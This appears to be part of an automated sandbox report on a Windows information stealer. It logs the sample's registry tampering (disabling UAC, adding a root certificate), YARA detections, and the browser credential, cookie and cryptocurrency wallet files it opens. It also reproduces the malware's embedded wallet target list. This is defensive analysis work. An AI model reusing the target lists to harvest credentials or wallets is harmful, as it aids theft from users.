                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp | Queries volume information: C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp | Queries volume information: C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe | Code function: 12_2_004026C4 GetSystemTime
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_0045559C GetUserNameA
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe | Code function: 12_2_00405CF4 GetVersionExA
                        Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Users\user\Desktop\file.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 17.2.syncUpd.exe.6a0e67.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 17.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 17.3.syncUpd.exe.8c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 17.3.syncUpd.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 17.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 17.2.syncUpd.exe.6a0e67.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.3188878338.0000000002B21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: weblinkanalyzer.exe PID: 7312, type: MEMORYSTR
                        Source: Yara match | File source: 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: syncUpd.exe PID: 44208, type: MEMORYSTR
                        Source: syncUpd.exe, 00000011.00000002.3283292607.0000000026EC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\*.*~
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmp - String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmp - String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmp - String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet*Xq
                        Source: syncUpd.exe, 00000011.00000002.3283292607.0000000026EC2000.00000004.00000020.00020000.00000000.sdmp - String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: Yara match - File source: Process Memory Space: syncUpd.exe PID: 44208, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match - File source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
                        Source: Yara match - File source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match - File source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
                        Source: Yara match - File source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match - File source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match - File source: 17.2.syncUpd.exe.6a0e67.1.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 17.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 17.3.syncUpd.exe.8c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 17.3.syncUpd.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 17.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 17.2.syncUpd.exe.6a0e67.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match - File source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match - File source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match - File source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                        Source: Yara match - File source: 00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match - File source: 00000015.00000002.3188878338.0000000002B21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match - File source: Process Memory Space: weblinkanalyzer.exe PID: 7312, type: MEMORYSTR
                        Source: Yara match - File source: 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match - File source: Process Memory Space: syncUpd.exe PID: 44208, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - Code function: 17_2_6A590B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,17_2_6A590B40
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - Code function: 17_2_6A4B8EA0 sqlite3_clear_bindings,17_2_6A4B8EA0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - Code function: 17_2_6A590C40 sqlite3_bind_zeroblob,17_2_6A590C40
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - Code function: 17_2_6A590D60 sqlite3_bind_parameter_name,17_2_6A590D60
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe - Code function: 17_2_6A4422D0 sqlite3_bind_blob,17_2_6A4422D0
                        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                        | Gather Victim Identity Information | 11 Scripting | Valid Accounts | 13 Native API | 11 Scripting | 1 Exploitation for Privilege Escalation | 211 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
                        | Credentials | Domains | Default Accounts | 1 Shared Modules | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
